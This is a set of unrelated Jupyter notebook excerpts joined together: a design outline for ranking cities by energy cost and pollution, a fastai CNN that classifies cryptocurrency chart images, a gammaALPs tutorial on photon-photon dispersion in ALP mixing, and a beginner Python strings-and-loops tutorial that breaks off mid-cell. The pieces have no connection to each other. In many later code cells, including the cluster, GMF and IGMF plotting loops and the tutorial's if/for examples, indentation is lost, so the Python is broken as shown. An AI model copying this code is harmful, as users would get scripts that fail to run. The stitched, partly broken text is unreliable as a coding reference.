#### 1.2. Find or predict the available solar and wind energy.
**Component Design:**
1. function name: predict_energy()
2. take the information of time and location
3. download the data of insolation and wind speed/direction
4. calculate or predict the generation of solar and wind energy
5. output the information of available solar and wind energy
### 2. Assess the time-and-space-dependent balance between energy consumption and generation.
#### 2.1. Input a specific time and location.
**Component Design:**
1. function name: get_location_and_time()
2. take the input: DD/MM/YY, zipcode
3. if the input is wrong, output an error message
#### 2.2. Find or predict the energy consumption.
**Component Design:**
1. function name: energy_consumption()
2. take the information of time and location
3. download the data of energy consumption.
4. predict the energy consumption in the future.
#### 2.3. Find the balance between the energy consumption and the generation of solar and wind energy.
#### And find the balance between future energy consumption and future generation of solar and wind energy.
**Component Design:**
1. function name: energy_balance()
2. take the energy consumption information from 2.2.
3. take the energy generation information from 1.2.
4. output the energy balance.
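A minimal sketch of `energy_balance()` as specified; the unit (MWh) and the sign convention (positive means renewable generation exceeds consumption) are assumptions:
```
def energy_balance(consumption_mwh, solar_mwh, wind_mwh):
    # Positive balance: renewable surplus; negative: deficit to cover from other sources
    generation = solar_mwh + wind_mwh
    return generation - consumption_mwh

surplus = energy_balance(consumption_mwh=120.0, solar_mwh=80.0, wind_mwh=60.0)
deficit = energy_balance(consumption_mwh=200.0, solar_mwh=50.0, wind_mwh=40.0)
```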
### 3. Evaluate the cost and pollution according to the energy balance
#### 3.1. Evaluate the cost.
**Component Design:**
1. function name: cost_evaluation()
2. take the input: energy balance, cost of all kinds of energy sources
3. output the total cost
#### 3.2. Evaluate the pollution.
**Component Design:**
1. function name: pollution_evaluation()
2. take the input: energy balance, pollution caused by all kinds of energy sources
3. output the total pollution
### 4. Rank the cities according to the total cost and pollution, respectively.
#### 4.1. Collect the energy balance information of the cities.
**Component Design:**
1. function name: energy_balance_list()
2. create a list of cities
3. take the energy consumption information from 2.2. for each city
4. take the energy generation information from 1.2. for each city
5. find and output the balance between the above two for each city
6. create and output a list of the energy balance of the cities
#### 4.2. Collect the energy generation cost of the cities.
1. function name: cost_evaluation_list()
2. take the energy balance list from 4.1.
3. calculate the energy generation cost for the cities with 3.1.
4. create and output a list of the energy generation cost of the cities
5. rank the cities according to the energy generation cost
#### 4.3. Collect the pollution caused by energy sources at the cities.
1. function name: pollution_evaluation_list()
2. take the energy balance list from 4.1.
3. calculate the pollution caused by energy sources at the cities with 3.2.
4. create and output a list of the pollution caused by energy sources at the cities
5. rank the cities according to the pollution caused by energy sources at the cities

---
#### Setup Notebook
```
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:80% !important; }</style>"))
# Put these at the top of every notebook, to get automatic reloading and inline plotting
%reload_ext autoreload
%autoreload 2
%matplotlib inline
```
# Predicting Price Movements of Cryptocurrencies - Using Convolutional Neural Networks to Classify 2D Images of Chart Data
```
# This file contains all the main external libs we'll use
from fastai.imports import *
from fastai.transforms import *
from fastai.conv_learner import *
from fastai.model import *
from fastai.dataset import *
from fastai.sgdr import *
from fastai.plots import *
# For downloading files
from IPython.display import FileLink, FileLinks
# For confusion matrix
from sklearn.metrics import confusion_matrix
PATH = 'data/btc/btcgraphs_cropped/'
!ls {PATH}
os.listdir(f'{PATH}train')
files = os.listdir(f'{PATH}train/DOWN')[:5]
files
img = plt.imread(f'{PATH}train/DOWN/{files[3]}')
print(f'{PATH}train/DOWN/{files[0]}')
print(f'{PATH}train/DOWN/{files[1]}')
plt.imshow(img)
FileLink(f'{PATH}train/DOWN/{files[3]}')
```
# The Steps to Follow
1. Enable data augmentation, and precompute=True
1. Use `lr_find()` to find highest learning rate where loss is still clearly improving
1. Train last layer from precomputed activations for 1-2 epochs
1. Train last layer with data augmentation (i.e. precompute=False) for 2-3 epochs with cycle_len=1
1. Unfreeze all layers
1. Set earlier layers to 3x-10x lower learning rate than next higher layer
1. Use `lr_find()` again
1. Train full network with cycle_mult=2 until over-fitting
## 0. Setup
```
arch = resnet34
sz = 480
batch_size = int(64)
```
## 1. Data Augmentation
**Not using data augmentation this time**
Starting without using data augmentation because I don't think it makes sense for these graphs: we don't need to generalize to slightly different angles. All plots will always be straight on and square in the frame.
```
tfms = tfms_from_model(arch, sz)
data = ImageClassifierData.from_paths(PATH, bs=batch_size, tfms=tfms,
                                      trn_name='train', val_name='valid')  # , test_name='test'
```
## 2. Choose a Learning Rate
```
learn = ConvLearner.pretrained(arch, data, precompute=True)
learn.save('00_pretrained_480')
# learn.precompute = True
learn.load('00_pretrained_480')
lrf = learn.lr_find()
learn.sched.plot_lr()
learn.sched.plot()
learn.save('01_lr_found_480')
```
## 3. Train Last Layer
```
# learn.precompute = True
learn.load('01_lr_found_480')
learn.fit(1e-4, 1, cycle_save_name='01_weights')
learn.save("02_trained_once_480")
```
#### Accuracy
TODO
Do some tests on accuracy of training on single epoch
## 4. Train Last Layer with Data Augmentation
**Not actually using any augmentation, this is just a few more rounds of training**
```
# learn.precompute = True
learn.load("02_trained_once_480")
learn.precompute=False #I don't think this makes a difference without data augmentation
learn.fit(1e-4, 3, cycle_len=1, best_save_name="02_best_model", cycle_save_name='02_weights')
learn.save("03_trained_2x_480")
learn.load("trained_2_market_movement")
```
More accuracy test...
```
learn.unfreeze()
```
Using a relatively large learning rate to train the previous layers because this data set is not very similar to ImageNet.
```
lr = np.array([0.0001/9, 0.0001/3, 0.00001])
learn.fit(lr, 3, cycle_len=1, cycle_mult=2,
          best_save_name="03_best_model", cycle_save_name='03_weights')
learn.save("trained_3_market_movement")
learn.load("trained_3_market_movement")
```
# Look at Results
```
data.val_y
data.classes
# this gives prediction for validation set. Predictions are in log scale
log_preds = learn.predict()
log_preds.shape
log_preds[:10]
preds = np.argmax(log_preds, axis=1) # from log probabilities to 0 or 1
probs = np.exp(log_preds[:,1]) # probability of class 1 ('UP')
probs
probs[1]
def rand_by_mask(mask):
    return np.random.choice(np.where(mask)[0], 4, replace=False)

def rand_by_correct(is_correct):
    return rand_by_mask((preds == data.val_y) == is_correct)

def plot_val_with_title(idxs, title):
    imgs = np.stack([data.val_ds[x][0] for x in idxs])
    title_probs = [probs[x] for x in idxs]
    print(title)
    return plots(data.val_ds.denorm(imgs), rows=1, titles=title_probs)

def plots(ims, figsize=(12,6), rows=1, titles=None):
    f = plt.figure(figsize=figsize)
    for i in range(len(ims)):
        sp = f.add_subplot(rows, len(ims)//rows, i+1)
        sp.axis('Off')
        if titles is not None: sp.set_title(titles[i], fontsize=16)
        plt.imshow(ims[i])

def load_img_id(ds, idx):
    return np.array(PIL.Image.open(PATH + ds.fnames[idx]))

def plot_val_with_title(idxs, title):
    imgs = [load_img_id(data.val_ds, x) for x in idxs]
    title_probs = [probs[x] for x in idxs]
    print(title)
    return plots(imgs, rows=1, titles=title_probs, figsize=(16,8))
plot_val_with_title(rand_by_correct(True), "Correctly classified")
def most_by_mask(mask, mult):
    idxs = np.where(mask)[0]
    return idxs[np.argsort(mult * probs[idxs])[:4]]

def most_by_correct(y, is_correct):
    mult = -1 if (y == 1) == is_correct else 1
    return most_by_mask(((preds == data.val_y) == is_correct) & (data.val_y == y), mult)
plot_val_with_title(most_by_correct(0, True), "Most correct DOWN")
plot_val_with_title(most_by_correct(1, True), "Most correct UP")
plot_val_with_title(most_by_correct(0, False), "Most incorrect DOWN")
```
# Analyze Results
```
data.val_y
log_preds = learn.predict()
preds = np.argmax(log_preds, axis=1) # from log probabilities to 0 or 1
probs = np.exp(log_preds[:,1]) # probability of class 1 ('UP')
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(data.val_y, preds)
plot_confusion_matrix(cm, data.classes)
cm
(cm[0][0]+cm[1][1])/(np.sum(cm))
np.sum(cm)-(42313)
```
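The accuracy computed in the last cell is the trace of the confusion matrix divided by its total; as a standalone sketch with a made-up matrix:
```
import numpy as np

# Hypothetical 2-class confusion matrix: rows = true (DOWN, UP), cols = predicted
cm = np.array([[50, 10],
               [ 5, 35]])

accuracy = np.trace(cm) / cm.sum()  # correct guesses / all guesses
```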
---
# Photon-photon dispersion
This tutorial shows how to include photon-photon dispersion off of background photon fields in the ALP-photon propagation calculation. The relevance of photon dispersion for ALP calculations is discussed in [Dobrynina 2015](https://journals.aps.org/prd/abstract/10.1103/PhysRevD.91.083003). A background field adds to the dispersive part of the refractive index of the propagation medium $n = 1+\chi$. [Dobrynina 2015](https://journals.aps.org/prd/abstract/10.1103/PhysRevD.91.083003) show that at $z=0$, $\chi_{CMB} = 5.11\times10^{-43}$. Dispersion off the CMB is included by default, but other values of $\chi$ can be included manually.
First import what we will need:
```
from gammaALPs.core import Source, ALP, ModuleList
from gammaALPs.base import environs, transfer
import numpy as np
import matplotlib.pyplot as plt
from astropy import constants as c
from matplotlib.patheffects import withStroke
from astropy import units as u
import time
from scipy.interpolate import RectBivariateSpline as RBSpline
effect = dict(path_effects=[withStroke(foreground="w", linewidth=2)]) # used for plotting
```
$\chi$ is included in the code as a 2D spline function in energy and propagation distance. This means that the points at which $\chi$ is calculated at do not need to be exactly the same as the points used for the magnetic field. It is also possible to include $\chi$ as an array of size `(1)` if you want a constant value, or size `(len(EGeV),len(r))`, if you have calculated $\chi$ in the exact magnetic field domains you will be using.
## $\chi$ function
We will create a fake $\chi$ function which changes with distance and energy, and then see its effects on mixing in different environments.
```
EGeV = np.logspace(-5.,6.,1000)
chiCMB = transfer.chiCMB
chiCMB
```
$r$ will be in pc for the jets and kpc for the clusters and GMF.
```
rs = np.logspace(-2,5,200)
chis = 1.e9 * rs[np.newaxis,:]**-3 * chiCMB * EGeV[:,np.newaxis]**(1.5) + chiCMB
plt.loglog(rs,chis[0,:])
plt.loglog(rs,chis[500,:])
plt.loglog(rs,chis[-1,:])
plt.ylabel(r'$\chi$')
plt.xlabel('r [pc or kpc] or z')
```
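The toy $\chi$ array can also be sanity-checked numerically; the `chiCMB` value below assumes `transfer.chiCMB` equals the Dobrynina et al. figure of $5.11\times10^{-43}$ at $z=0$:
```
import numpy as np

chiCMB = 5.11e-43                      # CMB photon-photon dispersion at z = 0 (assumed)
EGeV = np.logspace(-5., 6., 1000)
rs = np.logspace(-2, 5, 200)

# Same toy model as above: grows with energy, falls off steeply with distance,
# and never drops below the CMB floor
chis = 1.e9 * rs[np.newaxis, :]**-3 * chiCMB * EGeV[:, np.newaxis]**1.5 + chiCMB
```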
Our $\chi$ changes with both energy and distance.
```
ee, rr = np.meshgrid(EGeV,rs,indexing='ij')
plt.pcolormesh(ee, rr, np.log10(chis), cmap=plt.get_cmap('coolwarm'),
               shading='auto')
plt.colorbar(label=r"log($\chi$)")
plt.xscale('log')
plt.yscale('log')
plt.xlabel('E [GeV]')
plt.ylabel('r [pc or kpc]')
```
Make the spline function:
```
chispl = RBSpline(EGeV,rs,chis,kx=1,ky=1,s=0)
```
Now we can test it for a source. We will use 3C454.3 (see the individual environment tutorials for more details on each of the environments).
```
src = Source(z=0.859 , ra='22h53m57.7s', dec='+16d08m54s', bLorentz=60.) # 3C454.3
pin = np.diag((1.,1.,0.)) * 0.5
```
## Jet
First, let's test the `"Jet"` class:
```
ml = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml_chi = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
# other jet
gamma_min = 18.
```
Add the same jet module to each, including $\chi$ with the `chi` keyword for the second one.
```
ml.add_propagation("Jet",
                   0,  # position of module counted from the source.
                   B0=0.32,  # Jet field at r = R0 in G
                   r0=1.,  # distance from BH where B = B0 in pc
                   rgam=3.19e17 * u.cm.to('pc'),  # distance of gamma-ray emitting region to BH
                   alpha=-1.,  # exponent of toroidal magnetic field (default: -1.)
                   psi=np.pi/4.,  # Angle between one photon polarization state and B field.
                                  # Assumed constant over entire jet.
                   helical=True,  # if True, use helical magnetic-field model from Clausen-Brown et al. (2011).
                                  # In this case, the psi kwarg is treated as the phi angle
                                  # of the photon trajectory in the cylindrical jet coordinate system
                   equipartition=True,  # if True, assume equipartition between electrons and the B field.
                                        # This will overwrite the exponent of electron density beta = 2 * alpha
                                        # and set n0 given the minimum electron Lorentz factor set with gamma_min
                   gamma_min=gamma_min,  # minimum Lorentz factor of emitting electrons, only used if equipartition=True
                   gamma_max=np.exp(10.) * gamma_min,  # maximum Lorentz factor of emitting electrons,
                                                       # only used if equipartition=True
                   Rjet=40.,  # maximum jet length in pc (default: 1000.)
                   n0=1e4,  # normalization of electron density, overwritten if equipartition=True
                   beta=-2.  # power-law index of electron density, overwritten if equipartition=True
                   )
ml_chi.add_propagation("Jet",
                       0,  # position of module counted from the source.
                       B0=0.32,  # Jet field at r = R0 in G
                       r0=1.,  # distance from BH where B = B0 in pc
                       rgam=3.19e17 * u.cm.to('pc'),  # distance of gamma-ray emitting region to BH
                       alpha=-1.,  # exponent of toroidal magnetic field (default: -1.)
                       psi=np.pi/4.,  # Angle between one photon polarization state and B field.
                                      # Assumed constant over entire jet.
                       helical=True,  # if True, use helical magnetic-field model from Clausen-Brown et al. (2011).
                                      # In this case, the psi kwarg is treated as the phi angle
                                      # of the photon trajectory in the cylindrical jet coordinate system
                       equipartition=True,  # if True, assume equipartition between electrons and the B field.
                                            # This will overwrite the exponent of electron density beta = 2 * alpha
                                            # and set n0 given the minimum electron Lorentz factor set with gamma_min
                       gamma_min=gamma_min,  # minimum Lorentz factor of emitting electrons, only used if equipartition=True
                       gamma_max=np.exp(10.) * gamma_min,  # maximum Lorentz factor of emitting electrons,
                                                           # only used if equipartition=True
                       Rjet=40.,  # maximum jet length in pc (default: 1000.)
                       n0=1e4,  # normalization of electron density, overwritten if equipartition=True
                       beta=-2.,  # power-law index of electron density, overwritten if equipartition=True
                       chi=chispl
                       )
```
Pick a mass and coupling where there is some mixing, and run the calculation for each.
```
ml.alp.m = 100.
ml.alp.g = 0.3
ml_chi.alp.m = 100.
ml_chi.alp.g = 0.3
px, py, pa = ml.run()
pgg = px + py
px_c, py_c, pa_c = ml_chi.run()
pgg_chi = px_c + py_c
for p in pgg:
    plt.plot(ml.EGeV, p, label=r'$\chi_{CMB}$')
for p_c in pgg_chi:
    plt.plot(ml_chi.EGeV, p_c, label=r'$\chi$-spline')
plt.grid(True, lw = 0.2)
plt.grid(True, which = 'minor', axis = 'y', lw = 0.2)
plt.xlabel('Energy (GeV)')
plt.ylabel(r'Photon survival probability')
plt.gca().set_xscale('log')
plt.annotate(r'$m_a = {0:.1f}\,\mathrm{{neV}}, g_{{a\gamma}}'
             r' = {1:.2f} \times 10^{{-11}}\,\mathrm{{GeV}}^{{-1}}$'.format(ml.alp.m, ml.alp.g),
             xy=(0.05, 0.1),
             size='large',
             xycoords='axes fraction',
             ha='left',
             **effect)
plt.legend(loc='upper left')
```
The $P_{\gamma\gamma}$'s are quite different between the two cases. $\chi$ affects the mixing by lowering the high critical energy, $E_{crit}^{high}$, and so often reduces mixing at very high energies.
## Cluster
Now let's look at a cluster magnetic field, `"ICMGaussTurb"`. We can use the same $\chi$ array in $(E,r)$ but this time $r$ will be in kpc instead of pc.
```
# cluster
ml = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml_chi = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml.add_propagation("ICMGaussTurb",
                   0,  # position of module counted from the source.
                   nsim=1,  # number of random B-field realizations
                   B0=10.,  # rms of B field
                   n0=39.,  # normalization of electron density
                   n2=4.05,  # second normalization of electron density, see Churazov et al. 2003, Eq. 4
                   r_abell=500.,  # extension of the cluster
                   r_core=80.,  # electron density parameter, see Churazov et al. 2003, Eq. 4
                   r_core2=280.,  # electron density parameter, see Churazov et al. 2003, Eq. 4
                   beta=1.2,  # electron density parameter, see Churazov et al. 2003, Eq. 4
                   beta2=0.58,  # electron density parameter, see Churazov et al. 2003, Eq. 4
                   eta=0.5,  # scaling of B-field with electron density
                   kL=0.18,  # maximum turbulence scale in kpc^-1, taken from A2199 cool-core cluster, see Vacca et al. 2012
                   kH=9.,  # minimum turbulence scale, taken from A2199 cool-core cluster, see Vacca et al. 2012
                   q=-2.80,  # turbulence spectral index, taken from A2199 cool-core cluster, see Vacca et al. 2012
                   seed=0  # random seed for reproducibility, set to None for random seed.
                   )
ml_chi.add_propagation("ICMGaussTurb",
                       0,  # position of module counted from the source.
                       nsim=1,  # number of random B-field realizations
                       B0=10.,  # rms of B field
                       n0=39.,  # normalization of electron density
                       n2=4.05,  # second normalization of electron density, see Churazov et al. 2003, Eq. 4
                       r_abell=500.,  # extension of the cluster
                       r_core=80.,  # electron density parameter, see Churazov et al. 2003, Eq. 4
                       r_core2=280.,  # electron density parameter, see Churazov et al. 2003, Eq. 4
                       beta=1.2,  # electron density parameter, see Churazov et al. 2003, Eq. 4
                       beta2=0.58,  # electron density parameter, see Churazov et al. 2003, Eq. 4
                       eta=0.5,  # scaling of B-field with electron density
                       kL=0.18,  # maximum turbulence scale in kpc^-1, taken from A2199 cool-core cluster, see Vacca et al. 2012
                       kH=9.,  # minimum turbulence scale, taken from A2199 cool-core cluster, see Vacca et al. 2012
                       q=-2.80,  # turbulence spectral index, taken from A2199 cool-core cluster, see Vacca et al. 2012
                       seed=0,  # random seed for reproducibility, set to None for random seed.
                       chi=chispl
                       )
ml.alp.m = 10.
ml.alp.g = 0.7
ml_chi.alp.m = 10.
ml_chi.alp.g = 0.7
px, py, pa = ml.run()
pgg = px + py
px_c, py_c, pa_c = ml_chi.run()
pgg_chi = px_c + py_c
for pi,p in enumerate(pgg):
if pi==0:
plt.plot(ml.EGeV, p, color=plt.cm.tab10(0.), alpha = 0.7, label=r'$\chi_{CMB}$')
else:
plt.plot(ml.EGeV, p, color=plt.cm.tab10(0.),alpha = 0.1)
for pi_c,p_c in enumerate(pgg_chi):
if pi_c==0:
plt.plot(ml_chi.EGeV, p_c, color=plt.cm.tab10(1), alpha = 0.7, label=r'$\chi$-spline')
else:
plt.plot(ml_chi.EGeV, p_c, color=plt.cm.tab10(1),alpha = 0.1)
plt.grid(True, lw = 0.2)
plt.grid(True, which = 'minor', axis = 'y', lw = 0.2)
plt.xlabel('Energy (GeV)')
plt.ylabel(r'Photon survival probability')
plt.gca().set_xscale('log')
plt.annotate(r'$m_a = {0:.1f}\,\mathrm{{neV}}, g_{{a\gamma}}'
r' = {1:.2f} \times 10^{{-11}}\,\mathrm{{GeV}}^{{-1}}$'.format(ml.alp.m,ml.alp.g),
xy=(0.05,0.1),
size='large',
xycoords='axes fraction',
ha='left',
**effect)
plt.legend(loc='upper left')
```
Again, including $\chi$ lowers the highest energy at which there is strong mixing.
## GMF
For the GMF:
```
# GMF
ml = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml_chi = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml.add_propagation("GMF",
0,
model='jansson12')
ml_chi.add_propagation("GMF",
0,
model='jansson12',
chi = chispl)
ml.alp.m = 1.
ml.alp.g = 3.
ml_chi.alp.m = 1.
ml_chi.alp.g = 3.
px, py, pa = ml.run()
pgg = px + py
px_c, py_c, pa_c = ml_chi.run()
pgg_chi = px_c + py_c
for p in pgg:
plt.plot(ml.EGeV, p, label=r'$\chi_{CMB}$')
for p_c in pgg_chi:
plt.plot(ml_chi.EGeV, p_c, label=r'$\chi$-spline')
plt.grid(True, lw = 0.2)
plt.grid(True, which = 'minor', axis = 'y', lw = 0.2)
plt.xlabel('Energy (GeV)')
plt.ylabel(r'Photon survival probability')
plt.gca().set_xscale('log')
plt.annotate(r'$m_a = {0:.1f}\,\mathrm{{neV}}, g_{{a\gamma}}'
r' = {1:.2f} \times 10^{{-11}}\,\mathrm{{GeV}}^{{-1}}$'.format(ml.alp.m,ml.alp.g),
xy=(0.05,0.1),
size='large',
xycoords='axes fraction',
ha='left',
**effect)
plt.legend(loc='upper left')
```
The effect is the same.
## IGMF
Mixing in the IGMF is slightly different. Far from pair-production energies, $\chi \propto \rho$, where $\rho$ is the energy density of the background field. The energy density of the CMB evolves with redshift as $\rho \propto T^4 \propto (1+z)^4$. Therefore, by default, mixing in the IGMF doesn't use a constant value of $\chi_{CMB}$, but rather $\chi(z)=\chi_{CMB}(1+z)^4$, where $\chi_{CMB} = 5.11\times10^{-43}$ is the value quoted above, evaluated at $z=0$.
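The redshift scaling is simple enough to sketch directly. The numerical value of $\chi_{CMB}$ is the one quoted above; the function name is ours, not part of the library:

```python
# chi(z) = chi_CMB * (1 + z)^4, following rho_CMB ~ T^4 ~ (1+z)^4
chi_CMB = 5.11e-43  # value at z = 0, as quoted in the text

def chi_of_z(z):
    """Dispersion term chi for the CMB at redshift z."""
    return chi_CMB * (1.0 + z) ** 4

print(chi_of_z(0.0))  # equals chi_CMB
print(chi_of_z(1.0))  # a factor (1 + 1)^4 = 16 larger
```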
It is also possible to manually include a spline function for $\chi$ in the IGMF, but now the spline needs to be in energy and redshift instead of energy and distance:
```
zs = np.logspace(-1,np.log10(1.5),200)
chispl_z = RBSpline(EGeV,zs,chis,kx=1,ky=1,s=0)
# IGMF
ml = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml_chi = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml_chiz = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
```
For comparison we will also include a constant value of $\chi_{CMB}$. Any environment will accept a single value of chi in the form of `chi=np.array([chi])`.
```
ml.add_propagation("IGMF",
0, # position of module counted from the source.
nsim=1, # number of random B-field realizations
B0=1e-3, # B field strength in micro Gauss at z = 0
n0=1e-7, # normalization of electron density in cm^-3 at z = 0
L0=1e3, # coherence (cell) length in kpc at z = 0
eblmodel='dominguez', # EBL model
chi = np.array([chiCMB])
)
ml_chi.add_propagation("IGMF",
0, # position of module counted from the source.
nsim=1, # number of random B-field realizations
B0=1e-3, # B field strength in micro Gauss at z = 0
n0=1e-7, # normalization of electron density in cm^-3 at z = 0
L0=1e3, # coherence (cell) length in kpc at z = 0
eblmodel='dominguez', # EBL model
chi = chispl_z
)
ml_chiz.add_propagation("IGMF",
0, # position of module counted from the source.
nsim=1, # number of random B-field realizations
B0=1e-3, # B field strength in micro Gauss at z = 0
n0=1e-7, # normalization of electron density in cm^-3 at z = 0
L0=1e3, # coherence (cell) length in kpc at z = 0
eblmodel='dominguez' # EBL model
)
ml.alp.m = 0.1
ml.alp.g = 3.
ml_chi.alp.m = 0.1
ml_chi.alp.g = 3.
ml_chiz.alp.m = 0.1
ml_chiz.alp.g = 3.
px, py, pa = ml.run()
pgg = px + py
px_c, py_c, pa_c = ml_chi.run()
pgg_chi = px_c + py_c
px_cz, py_cz, pa_cz = ml_chiz.run()
pgg_chiz = px_cz + py_cz
for p in pgg:
plt.plot(ml.EGeV, p, label=r'$\chi_{CMB}$')
for p_cz in pgg_chiz:
plt.plot(ml_chiz.EGeV, p_cz, label=r'$\chi_{CMB} (1+z)^4$')
for p_c in pgg_chi:
plt.plot(ml_chi.EGeV, p_c, label=r'$\chi$-spline')
plt.grid(True, lw = 0.2)
plt.grid(True, which = 'minor', axis = 'y', lw = 0.2)
plt.xlabel('Energy (GeV)')
plt.ylabel(r'Photon survival probability')
plt.gca().set_xscale('log')
plt.annotate(r'$m_a = {0:.1f}\,\mathrm{{neV}}, g_{{a\gamma}}'
r' = {1:.2f} \times 10^{{-11}}\,\mathrm{{GeV}}^{{-1}}$'.format(ml.alp.m,ml.alp.g),
xy=(0.05,0.1),
size='large',
xycoords='axes fraction',
ha='left',
**effect)
plt.legend()
```
All three treatments of $\chi$ give visibly different survival probabilities.
## Multiline string
```
print("""
This is a multi line string
this is good
""")
print("This is a multi line string \n This is too good")
```
### Sub Strings
```
s = "Namaste World"
# test substring membership
print("Namaste" in s)
print(" World" in s)
print("e W" in s)
print("Nasdasda" in s)
```
## Built-in String methods
### String Manipulation to change casing
```
s = "Hello World"
s.lower()
s.capitalize()
s_capitalize = s.capitalize()
s_capitalize.title()
```
### Replacement and Trim
```
# Strip
s = " Hello World "
s.rstrip()
s = "Hello World_._._.."
s.rstrip('_.')
s.rstrip('.')
s = "Hello World_._._.. "
s.strip('._ ')  # equivalent to the implicit concatenation '.' '_' ' '
```
### String splitting
```
word = "H.e.l.l o"
word.split(' ')
```
#### When a string is split, every token (including numbers and special characters) is still a string
```
s = "The quick ^%$^%^$% brown 222 fox jumped over the lazy dog"
s.split(' ')
```
## `print()` formatting
You can read this [Real Python's blog on print formatting](https://realpython.com/python-f-strings/)
```
name = "Newton"
age = 22
married = False
print("My name is:", name, " and my age is ", age)
print("My name is %s, my age is %s, and it is %s that I am married" % (name, age, married))
print("My name is {}, my age is {}, and it is {} that I am married".format(name, age, married))
print("My name is {n}, my age is {a}, and it is {m} that I am married".format(n=name, a=age, m=married))
# f-strings (Python 3.6+)
print(f"My name is {name} and age is {age}")
```
## Using `input()` function
```
number1 = input('Enter first number:')
number2 = input('Enter second number:')
```
#### When you get the values from users via `input()`, all those values are of the type `str`.
#### All you need is a little type casting if the values represent `float` or `int` numbers and you want to use them as such
```
print(type(number1))
print(type(number2))
```
#### How to convert `str` to `int`?
```
print(int(number1))
print(type(int(number1)))
```
#### Finally adding those two numbers that we got above
```
addition_ = float(number1) + float(number2)
print(addition_)
```
#### One can also directly print operations (e.g. addition here) on the fly
```
print("Addition:", (float(number1) + float(number2)))
```
#### Using `f-strings`
```
print(f"Addition: {float(number1) + float(number2)}")
```
## Basic Arithmetic
```
# Subtraction
sub = 2 - 1
sub
print(float(sub))
print(float(2 - 1))
```
#### How do you write $2 \times 10^{-2}$ in Python?
```
2e-2
```
#### For $2 \times 10^{3}$ (this syntax and rendering is called `LaTeX`, by the way)
#### How to write in Latex: [Click here](https://www.math.ubc.ca/~pwalls/math-python/jupyter/latex/)
```
2e3
# Multiplication
22132 * 2e2
# Division
0.1/5
```
### Formatting numbers with decimals
#### More formatting in details: [click here](https://pyformat.info/)
```
format(4.333333, '.3f')
round(4.333, 1)
print("Float value is {:.2f}".format(4.33333))
```
## Unpacking
```
a = 5
b = 3.14
c = "Movies"
a, b, c, *_ = 5, 3.14, "Movies", "Stray", "This", "Value"
print(a)
print(b)
print(c)
print(_)
```
### Little Detour on why use `_` (underscore) or `__` (double underscore aka dunder)
### When used in interpreter
The Python interpreter stores the value of the last expression in the special variable `_`.
### `single_trailing_underscore_`
This convention could be used for avoiding conflict with Python keywords or built-ins. You might not use it often.
```
len_ = 10  # the trailing underscore avoids shadowing the built-in len
len_
```
### `_single_leading_underscore`
This convention is used for declaring private variables, functions, methods, and classes in a module. Anything with this convention is ignored by `from module import *`.
```
_len = 10  # the leading underscore marks this as private by convention
_len
```
### `__double_leading_and_trailing_underscore__`
This convention is used for special variables or methods (so-called “magic methods”) such as `__init__` and `__len__`. These methods provide special syntactic features or do special things.
```
s = "this"
s.__len__()
len(s)
```
### In Python, everything is an `Object`: variables, lists, functions, and classes are all objects. From here on, when we refer to anything as an `Object`, it will have methods that can be called to perform operations on it.
### To find out what methods are available for an object, use the built-in function `dir()`
```
dir(s)
```
#### As previously seen, for any string the methods (`split`, `strip`, `capitalize` or other) are available!
### Accessing a value in dictionary
```
# Make a dictionary with {} and : to signify a key and a value
my_dict = {'key1':'value1','key2':'value2'}
# Call values by their key
print(my_dict['key2'])
print(my_dict.get('key2'))
```
### Method Chaining
```
my_dict = {0:123,
1:[12,23,33],
2:['item0','item1','item2']}
my_dict.get(2)[1].upper().title().lower().capitalize()
```
## Programming Constructs
### if, elif and else
```
a = "This"
b = 4
if a == b:  # == between a str and an int is fine (it is simply False)
    print("a is equal to b")
elif a > b:  # careful: ordering a str against an int raises TypeError in Python 3
    print("a is greater than b")
elif a < b:
    print("a is less than b")
else:
    print("What?")
```
### Going more complex
```
a = 6
b = 5
if (isinstance(a, int) and isinstance(b, int)):
if a > b:
print("a is greater than b")
elif a == b:
print("a is equal to b")
else:
print("a is less than b")
else:
print("There's a string here")
```
### for loops
### We calculate `range(len(my_list))` to get the indices needed to access the values in the list
```
my_list = [1, 2, 3, 4, 5, 6, 7, 8]
len(my_list)
range(len(my_list))
```
### Printing the indices
```
for i in range(len(my_list)):
print(i)
```
### Printing the values in a list using the indices
```
for i in range(len(my_list)):
print(my_list[i])
```
### Now that we have values being accessed, we can perform the tasks that we want to do
```
for i in range(len(my_list)):
print(my_list[i] * 2)
```
### There's a more pythonic way to use loops. Instead of the method above, we can directly iterate through the values without using the indices
```
for i in my_list:
print(i ** 0.5)
```
### There's another way to get the indices and values directly using `enumerate()`
```
for index, value in enumerate(my_list):
    print(index, ":", value)
```
### We could do more things, we can find values that are greater than 5 in a list using `if-elif-else`
```
my_list = [1, 2, 3, 4, 5, 6, 7, 8]
for num in my_list:
if num > 5:
print("Num is greater than 5")
elif num == 5:
print("Num is equal to 5")
else:
print("Num is less than 5")
```
### List comprehensions
#### For loops in a single line!
```
hello = []
names = ["Ravi", "Pooja", "Vijay", "Kiran"]
```
#### Using regular for loops, adding "Hello, {name}"
```
for i in names:
temp = "Hello," + i
print(temp)
hello.append(temp)
```
### We can do this more concisely, eliminating several lines from the code above (syntactic sugar)
```
["Hello," + value for value in names]
```
### List comprehensions are also faster than regular for loops
#### To find out the speed there are two Magic commands available for us: `%time` and `%timeit`
#### `%time` runs just once as: `%time "Whatever code you want to run"`
#### `%timeit` can be run `n` times as: `%timeit -n 1000 "Whatever code you want to run"`
```
value_range = range(10000)  # define the values to iterate over
%timeit -n 100 [value * 2 for value in value_range]
```
#### Note: If you benchmark the above list comprehension code and regular for loop code for the same operations, the for loop might be faster. But for longer running operations list comprehensions win out (generally)
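As a rough sketch of how such a comparison could be run with the standard `timeit` module outside a notebook (the sizes and repeat counts here are arbitrary choices):

```python
import timeit

setup = "values = range(10000)"

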